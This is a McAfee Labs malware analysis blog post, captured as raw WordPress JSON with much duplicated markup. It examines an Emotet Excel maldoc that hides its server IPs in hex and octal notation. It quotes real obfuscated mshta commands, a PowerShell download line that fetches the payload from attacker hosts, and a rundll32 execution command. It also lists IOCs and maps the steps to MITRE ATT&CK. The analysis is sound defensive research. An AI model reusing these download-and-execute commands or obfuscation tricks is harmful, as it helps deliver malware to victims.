![\"Figure](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/heatmap-1.png\")
Threat Summary<\/h2>\n\n- The initial attack vector is a phishing email with a Microsoft Excel attachment.<\/span>\u00a0<\/span><\/li>\n
- Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe<\/span>\u00a0<\/span><\/li>\n
- The malicious JavaScript further invokes PowerShell to download the Emotet payload.<\/span>\u00a0<\/span><\/li>\n
- The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.<\/span><\/li>\n<\/ol>\n
Maldoc Analysis<\/h2>\n
Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.<\/p>\n
![\"\"](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-2-initial-worksheet-and-hidden-macrosheets.png\")
<\/span><\/p>\nOn examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager<\/em> window. Cells mentioned in the Auto_Open<\/em> value will be executed automatically resulting in malicious code execution.<\/p>\n![\"Figure](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-3-Named-Manager-and-Auto_Open-triggers.png\")
Figure 3- Named Manager and Auto_Open triggers<\/figcaption><\/figure>\nBelow are the commands used in Hexadecimal and Octal variants of the Maldocs<\/p>\n
\n\n\nFORMAT<\/strong><\/td>\nOBFUSCATED CMD<\/strong><\/td>\nDEOBFUSCATED CMD<\/strong><\/td>\n<\/tr>\n\nHexadecimal<\/td>\n cmd \/c m^sh^t^a h^tt^p^:\/^\/[0x]b907d607\/fer\/fer.html<\/td>\n http:\/\/185[.]7[.]214[.]7\/fer\/fer.html<\/td>\n<\/tr>\n \nOctal<\/td>\n cmd \/c m^sh^t^a h^tt^p^:\/^\/0056[.]0151[.]0121[.]0114\/c.html<\/td>\n http:\/\/46[.]105[.]81[.]76\/c.html<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nExecution<\/h2>\n
On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.<\/p>\n![\"Figure](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-4-Process-tree-of-excel-execution.png\")
Figure 4: Process tree of excel execution<\/figcaption><\/figure>\nThe downloaded file fer.html<\/em> containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code<\/p>\n![\"Figure](\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/Figure-5-Image-of-HTML-page-viewed-on-browser.png\")
Figure 5- Image of HTML page viewed on a browser<\/figcaption><\/figure>\nThe Malicious JavaScript invokes PowerShell to download the Emotet payload from \u201chxxp:\/\/185[.]7[.]214[.]7\/fer\/fer.png<\/em>\u201d to the following path \u201cC:\\Users\\Public\\Documents\\ssd.dll\u201d<\/em>.<\/p>\n\n\n\ncmd line<\/em><\/td>\n(New-Object Net.WebClient).DownloadString(\u2018http:\/\/185[.]7[.]214[.]7\/fer\/fer.png\u2019)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nThe downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server<\/p>\n
\n\n\ncmd line<\/em><\/td>\ncmd \u00a0\/c C:\\Windows\\SysWow64\\rundll32.exe C:\\Users\\Public\\Documents\\ssd.dll,AnyString<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nIOC<\/h2>\n
\n\n\nTYPE<\/strong><\/td>\nVALUE<\/strong><\/td>\nSCANNER<\/strong><\/td>\nDETECTION NAME<\/strong><\/td>\n<\/tr>\n\nXLS<\/td>\n 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c<\/td>\n McAfee LiveSafe and Total Protection<\/td>\n X97M\/Downloader.nn<\/td>\n<\/tr>\n \nDLL<\/td>\n a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3<\/td>\n McAfee LiveSafe and Total Protection<\/p>\n <\/td>\n
Emotet-FSY<\/td>\n<\/tr>\n \nHTML URL<\/td>\n http:\/\/185[.]7[.]214[.]7\/fer\/fer.html<\/p>\nhttp:\/\/46[.]105[.]81[.]76\/c.html<\/td>\n
WebAdvisor<\/td>\n Blocked<\/td>\n<\/tr>\n \nDLL URL<\/td>\n http:\/\/185[.]7[.]214[.]7\/fer\/fer.png<\/p>\nhttp:\/\/46[.]105[.]81[.]76\/cc.png<\/td>\n
WebAdvisor<\/td>\n Blocked<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nMITRE ATT&CK<\/h2>\n
\n\n\nTECHNIQUE ID<\/strong><\/td>\nTACTIC<\/strong><\/td>\nTECHNIQUE DETAILS<\/strong><\/td>\nDESCRIPTION<\/strong><\/td>\n<\/tr>\n\nT1566<\/td>\n Initial access<\/td>\n Phishing attachment<\/td>\n Initial maldoc uses phishing strings to convince users to open the maldoc<\/td>\n<\/tr>\n \nT1204<\/td>\n Execution<\/td>\n User Execution<\/td>\n Manual execution by user<\/td>\n<\/tr>\n \nT1071<\/td>\n Command and Control<\/td>\n Standard Application Layer Protocol<\/td>\n Attempts to connect through HTTP<\/td>\n<\/tr>\n \nT1059<\/td>\n Command and Scripting Interpreter<\/td>\n Starts CMD.EXE for commands execution<\/td>\n Excel uses cmd and PowerShell to execute command<\/td>\n<\/tr>\n \nT1218<\/p>\n <\/td>\n
Signed Binary Proxy Execution<\/td>\n Uses RUNDLL32.EXE and MSHTA.EXE to load library<\/td>\n rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nConclusion<\/h2>\n
Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.<\/p>\n","protected":false},"excerpt":{"rendered":"
Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc…<\/p>\n","protected":false},"author":695,"featured_media":136771,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[12220],"coauthors":[4136],"class_list":["post-136663","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs","tag-emotet-maldoc"],"acf":[],"yoast_head":"\n
Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2022-02-04T23:00:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-17T16:24:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Emotet\u2019s Uncommon Approach of Masking IP Addresses\",\"datePublished\":\"2022-02-04T23:00:33+00:00\",\"dateModified\":\"2024-02-17T16:24:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\"},\"wordCount\":690,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\",\"keywords\":[\"Emotet maldoc\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\",\"name\":\"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\",\"datePublished\":\"2022-02-04T23:00:33+00:00\",\"dateModified\":\"2024-02-17T16:24:34+00:00\",\"description\":\"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Emotet\u2019s Uncommon Approach of Masking IP Addresses\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog","description":"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog","og_description":"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2022-02-04T23:00:33+00:00","article_modified_time":"2024-02-17T16:24:34+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","type":"image\/jpeg"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Emotet\u2019s Uncommon Approach of Masking IP Addresses","datePublished":"2022-02-04T23:00:33+00:00","dateModified":"2024-02-17T16:24:34+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/"},"wordCount":690,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","keywords":["Emotet maldoc"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/","name":"Emotet\u2019s Uncommon Approach of Masking IP Addresses | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","datePublished":"2022-02-04T23:00:33+00:00","dateModified":"2024-02-17T16:24:34+00:00","description":"Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2022\/02\/300x200_maskingIP.jpg","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/emotets-uncommon-approach-of-masking-ip-addresses\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Emotet\u2019s Uncommon Approach of Masking IP Addresses"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/136663","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=136663"}],"version-history":[{"count":1,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/136663\/revisions"}],"predecessor-version":[{"id":182847,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/136663\/revisions\/182847"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/136771"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=136663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=136663"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=136663"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=136663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Maldoc Analysis<\/h2>\n
Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.<\/p>\n
On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager<\/em> window. Cells mentioned in the Auto_Open<\/em> value will be executed automatically resulting in malicious code execution.<\/p>\n Below are the commands used in Hexadecimal and Octal variants of the Maldocs<\/p>\n On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.<\/p>\n The downloaded file fer.html<\/em> containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code<\/p>\n The Malicious JavaScript invokes PowerShell to download the Emotet payload from \u201chxxp:\/\/185[.]7[.]214[.]7\/fer\/fer.png<\/em>\u201d to the following path \u201cC:\\Users\\Public\\Documents\\ssd.dll\u201d<\/em>.<\/p>\n The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server<\/p>\n <\/td>\n http:\/\/46[.]105[.]81[.]76\/c.html<\/td>\n http:\/\/46[.]105[.]81[.]76\/cc.png<\/td>\n <\/td>\n Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.<\/p>\n","protected":false},"excerpt":{"rendered":" Authored By: Kiran Raj In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc…<\/p>\n","protected":false},"author":695,"featured_media":136771,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[12220],"coauthors":[4136],"class_list":["post-136663","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs","tag-emotet-maldoc"],"acf":[],"yoast_head":"\n<\/span><\/p>\n\n\n
\n FORMAT<\/strong><\/td>\n OBFUSCATED CMD<\/strong><\/td>\n DEOBFUSCATED CMD<\/strong><\/td>\n<\/tr>\n \n Hexadecimal<\/td>\n cmd \/c m^sh^t^a h^tt^p^:\/^\/[0x]b907d607\/fer\/fer.html<\/td>\n http:\/\/185[.]7[.]214[.]7\/fer\/fer.html<\/td>\n<\/tr>\n \n Octal<\/td>\n cmd \/c m^sh^t^a h^tt^p^:\/^\/0056[.]0151[.]0121[.]0114\/c.html<\/td>\n http:\/\/46[.]105[.]81[.]76\/c.html<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Execution<\/h2>\n
\n\n
\n cmd line<\/em><\/td>\n (New-Object Net.WebClient).DownloadString(\u2018http:\/\/185[.]7[.]214[.]7\/fer\/fer.png\u2019)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n \n\n
\n cmd line<\/em><\/td>\n cmd \u00a0\/c C:\\Windows\\SysWow64\\rundll32.exe C:\\Users\\Public\\Documents\\ssd.dll,AnyString<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n IOC<\/h2>\n
\n\n
\n TYPE<\/strong><\/td>\n VALUE<\/strong><\/td>\n SCANNER<\/strong><\/td>\n DETECTION NAME<\/strong><\/td>\n<\/tr>\n \n XLS<\/td>\n 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c<\/td>\n McAfee LiveSafe and Total Protection<\/td>\n X97M\/Downloader.nn<\/td>\n<\/tr>\n \n DLL<\/td>\n a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3<\/td>\n McAfee LiveSafe and Total Protection<\/p>\n Emotet-FSY<\/td>\n<\/tr>\n \n HTML URL<\/td>\n http:\/\/185[.]7[.]214[.]7\/fer\/fer.html<\/p>\n WebAdvisor<\/td>\n Blocked<\/td>\n<\/tr>\n \n DLL URL<\/td>\n http:\/\/185[.]7[.]214[.]7\/fer\/fer.png<\/p>\n WebAdvisor<\/td>\n Blocked<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n MITRE ATT&CK<\/h2>\n
\n\n
